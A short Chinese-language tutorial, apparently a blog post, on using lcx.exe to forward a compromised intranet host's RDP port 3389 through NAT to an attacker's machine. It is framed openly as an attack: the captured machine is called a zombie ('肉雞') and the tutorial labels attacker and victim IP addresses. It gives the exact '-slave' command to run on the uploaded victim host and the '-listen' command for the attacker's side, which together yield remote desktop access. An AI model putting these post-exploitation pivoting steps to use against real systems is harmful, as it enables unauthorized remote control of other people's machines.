lcx實現端口轉發
概念
比較經典的就是lcx。簡單說一下概念,首先內網中的主機一般都是使用的私有ip,在網絡出口處經過NAT轉換爲公網ip後,才能訪問internet。
所以,有時當我們進入網站後臺cmd,或者捕獲了一臺內網中的肉雞,是無法主動去鏈接這臺肉雞的,也不好在別人的網絡出口做端口映射,這就體現lcx的作用了。
lcx實現端口轉發,將肉雞A上的某個端口(常用的3389),轉發到具有公網地址的主機B上,這樣我們只需要連接主機B的3389端口就相當於連接到了肉雞A上,從而突破了內網私有ip的限制。
使用
攻擊者ip:192.168.1.2
受害者ip:192.168.1.3
將lcx.exe上傳到受害者主機上,執行:
lcx.exe -slave 192.168.1.2 8080 192.168.1.3 3389
然後攻擊者主機上執行:
lcx.exe -listen 8080 9999
這樣就將受害者主機的3389服務轉發到攻擊者本地的9999端口上了。只要攻擊者訪問127.0.0.1:9999就可以連接到受害者的遠程桌面